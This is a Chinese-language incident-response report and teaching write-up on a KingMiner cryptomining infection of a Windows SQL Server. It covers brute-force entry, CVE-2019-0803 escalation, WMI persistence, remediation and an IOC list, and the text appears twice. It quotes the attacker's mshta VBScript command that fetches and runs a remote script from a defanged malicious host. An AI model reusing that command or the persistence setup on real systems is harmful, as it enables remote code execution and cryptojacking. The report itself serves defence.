【实战】记一次实战“恶意外连”事件的应急响应
字数 2071 2025-08-06 18:08:14

恶意挖矿木马应急响应实战教学文档

1. 事件概述

1.1 事件背景

  • 某单位服务器IP(111.x.x.x)被通报存在与恶意域名news.g23xxx.com的通信行为
  • 恶意域名被威胁情报标记为KingMiner挖矿木马、僵尸网络和远控服务器

1.2 受影响系统

  • SQL Server数据库服务器(内网IP:10.10.10.10)
  • 数据共享平台
  • 操作系统: Windows服务器

2. 攻击链路分析

2.1 初始入侵

  • 攻击时间: 2022年3月4日11:17:02至2022年5月7日21:45:15
  • 攻击方式: MSSQL暴力破解
  • 攻击源IP:
    • 62.x.x.x (俄罗斯莫斯科)
    • 62.x.x.x (俄罗斯莫斯科)

2.2 恶意载荷投放

  • 攻击成功后执行VBS脚本
  • 下载经过base64编码的二进制blob文件
  • 解码后保存为: C:\Users\Public\Downloads\tool.exe

2.3 漏洞利用

  • 利用Windows权限提升漏洞CVE-2019-0803
  • 成功利用后攻击者可以:
    • 在内核模式下运行任意代码
    • 安装程序
    • 查看、更改或删除数据
    • 创建具有完全用户权限的新账户

2.4 持久化机制

  1. WMI定时器:

    • 名称: WindowsSystemUpdate_WMITimer
    • 每15分钟执行一次恶意VBS脚本
    • 通过事件消费者WindowsSystemUpdate_consumer和事件过滤器WindowsSystemUpdate_filter绑定

  2. 计划任务:

    • 创建Windows计划任务反复执行指定脚本

2.5 恶意行为

  • 执行命令: mshta.exe vbscript:GetObject("script:http[:]//aa.30583fdae.tk/r1.txt")(window.close)
  • 域名aa.30583xxxx.tk被标记为门罗币挖矿木马地址
  • 通过nslookup查询恶意域名"news.g23xxx.com"的DNS记录

3. 应急响应流程

3.1 初步定位

  1. 网络层面排查:

    • 互联网出口IP为111.x.x.x
    • 检查负载均衡、IPS、上网行为管理日志(未发现异常)

  2. 流量分析:

    • 使用Wireshark抓取互联网出口全流量
    • 过滤条件: udp && frame.contains "g23xxx"
    • 发现UDP协议恶意外连流量

3.2 主机排查

  1. 进程分析:

    • 发现大量恶意PowerShell进程

  2. 日志分析:

    • 发现MSSQL爆破记录
    • 发现恶意文件下载记录

  3. 文件分析:

    • 定位恶意文件tool.exe
    • 发现其他木马病毒样本

3.3 恶意样本分析

  1. 沙箱分析结果:

    • 行为分析图显示恶意活动
    • 程序运行示例图展示攻击流程

  2. 持久化机制:

    • WMI定时任务配置
    • 计划任务创建

4. 处置措施

4.1 紧急处置

  • 对受影响服务器进行断网处理
  • 全盘木马病毒查杀
  • 删除恶意启动项
  • 防火墙封禁恶意域名与IP地址

4.2 长期防护

  • 部署态势感知设备
  • 对恢复后的系统持续监测
  • 客户反馈该服务器将不再投入使用

5. 安全建议

5.1 防御措施

  1. 补丁管理:

    • 及时修复CVE-2019-0803等已知漏洞

  2. 账户安全:

    • 加强MSSQL账户密码复杂度
    • 启用账户锁定策略防止暴力破解

  3. 网络防护:

    • 部署网络流量监测设备
    • 限制外连行为

5.2 检测措施

  1. 日志监控:

    • 加强SQL Server日志分析
    • 监控异常PowerShell活动

  2. 行为检测:

    • 监控WMI定时任务创建
    • 检测异常计划任务

  3. 威胁情报:

    • 订阅最新威胁情报
    • 及时更新IOC(入侵指标)

5.3 响应准备

  1. 应急预案:

    • 制定针对挖矿木马的专项应急预案
    • 建立快速响应流程

  2. 取证能力:

    • 提升日志收集和分析能力
    • 建立样本分析流程

6. 技术指标(IOC)

6.1 恶意域名

  • news.g23xxx.com
  • aa.30583fdae.tk
  • aa.30583xxxx.tk

6.2 恶意IP

  • 62.x.x.x (俄罗斯莫斯科)
  • 154.x.x.x (解析IP)

6.3 恶意文件

  • C:\Users\Public\Downloads\tool.exe
  • r1.txt (恶意脚本)

6.4 持久化机制

  • WMI定时器: WindowsSystemUpdate_WMITimer
  • 事件消费者: WindowsSystemUpdate_consumer
  • 事件过滤器: WindowsSystemUpdate_filter

7. 总结

本次事件是典型的针对暴露在互联网的SQL Server服务器的攻击案例,攻击者通过暴力破解获得访问权限后,投放挖矿木马并建立持久化机制。事件暴露出以下问题:

  1. 边界防护不足,缺乏有效的流量监测手段
  2. 数据库安全配置薄弱,易受暴力破解攻击
  3. 终端防护软件未能有效检测恶意活动
  4. 缺乏有效的日志分析和异常行为监测

通过此案例,安全团队应加强对外暴露服务的防护,完善日志监控体系,并建立针对挖矿木马等常见威胁的快速响应机制。

恶意挖矿木马应急响应实战教学文档 1. 事件概述 1.1 事件背景 某单位服务器IP(111.x.x.x)被通报存在与恶意域名news.g23xxx.com的通信行为 恶意域名被威胁情报标记为KingMiner挖矿木马、僵尸网络和远控服务器 1.2 受影响系统 SQL Server数据库服务器(内网IP:10.10.10.10) 数据共享平台 操作系统: Windows服务器 2. 攻击链路分析 2.1 初始入侵 攻击时间 : 2022年3月4日11:17:02至2022年5月7日21:45:15 攻击方式 : MSSQL暴力破解 攻击源IP : 62.x.x.x (俄罗斯莫斯科) 62.x.x.x (俄罗斯莫斯科) 2.2 恶意载荷投放 攻击成功后执行VBS脚本 下载经过base64编码的二进制blob文件 解码后保存为: C:\Users\Public\Downloads\tool.exe 2.3 漏洞利用 利用Windows权限提升漏洞CVE-2019-0803 成功利用后攻击者可以: 在内核模式下运行任意代码 安装程序 查看、更改或删除数据 创建具有完全用户权限的新账户 2.4 持久化机制 WMI定时器 : 名称: WindowsSystemUpdate_WMITimer 每15分钟执行一次恶意VBS脚本 通过事件消费者 WindowsSystemUpdate_consumer 和事件过滤器 WindowsSystemUpdate_filter 绑定 计划任务 : 创建Windows计划任务反复执行指定脚本 2.5 恶意行为 执行命令: mshta.exe vbscript:GetObject("script:http[:]//aa.30583fdae.tk/r1.txt")(window.close) 域名 aa.30583xxxx.tk 被标记为门罗币挖矿木马地址 通过 nslookup 查询恶意域名"news.g23xxx.com"的DNS记录 3. 应急响应流程 3.1 初步定位 网络层面排查 : 互联网出口IP为111.x.x.x 检查负载均衡、IPS、上网行为管理日志(未发现异常) 流量分析 : 使用Wireshark抓取互联网出口全流量 过滤条件: udp && frame.contains "g23xxx" 发现UDP协议恶意外连流量 3.2 主机排查 进程分析 : 发现大量恶意PowerShell进程 日志分析 : 发现MSSQL爆破记录 发现恶意文件下载记录 文件分析 : 定位恶意文件 tool.exe 发现其他木马病毒样本 3.3 恶意样本分析 沙箱分析结果 : 行为分析图显示恶意活动 程序运行示例图展示攻击流程 持久化机制 : WMI定时任务配置 计划任务创建 4. 处置措施 4.1 紧急处置 对受影响服务器进行断网处理 全盘木马病毒查杀 删除恶意启动项 防火墙封禁恶意域名与IP地址 4.2 长期防护 部署态势感知设备 对恢复后的系统持续监测 客户反馈该服务器将不再投入使用 5. 安全建议 5.1 防御措施 补丁管理 : 及时修复CVE-2019-0803等已知漏洞 账户安全 : 加强MSSQL账户密码复杂度 启用账户锁定策略防止暴力破解 网络防护 : 部署网络流量监测设备 限制外连行为 5.2 检测措施 日志监控 : 加强SQL Server日志分析 监控异常PowerShell活动 行为检测 : 监控WMI定时任务创建 检测异常计划任务 威胁情报 : 订阅最新威胁情报 及时更新IOC(入侵指标) 5.3 响应准备 应急预案 : 制定针对挖矿木马的专项应急预案 建立快速响应流程 取证能力 : 提升日志收集和分析能力 建立样本分析流程 6. 技术指标(IOC) 6.1 恶意域名 news.g23xxx.com aa.30583fdae.tk aa.30583xxxx.tk 6.2 恶意IP 62.x.x.x (俄罗斯莫斯科) 154.x.x.x (解析IP) 6.3 恶意文件 C:\Users\Public\Downloads\tool.exe r1.txt (恶意脚本) 6.4 持久化机制 WMI定时器: WindowsSystemUpdate_WMITimer 事件消费者: WindowsSystemUpdate_consumer 事件过滤器: WindowsSystemUpdate_filter 7. 总结 本次事件是典型的针对暴露在互联网的SQL Server服务器的攻击案例,攻击者通过暴力破解获得访问权限后,投放挖矿木马并建立持久化机制。事件暴露出以下问题: 边界防护不足,缺乏有效的流量监测手段 数据库安全配置薄弱,易受暴力破解攻击 终端防护软件未能有效检测恶意活动 缺乏有效的日志分析和异常行为监测 通过此案例,安全团队应加强对外暴露服务的防护,完善日志监控体系,并建立针对挖矿木马等常见威胁的快速响应机制。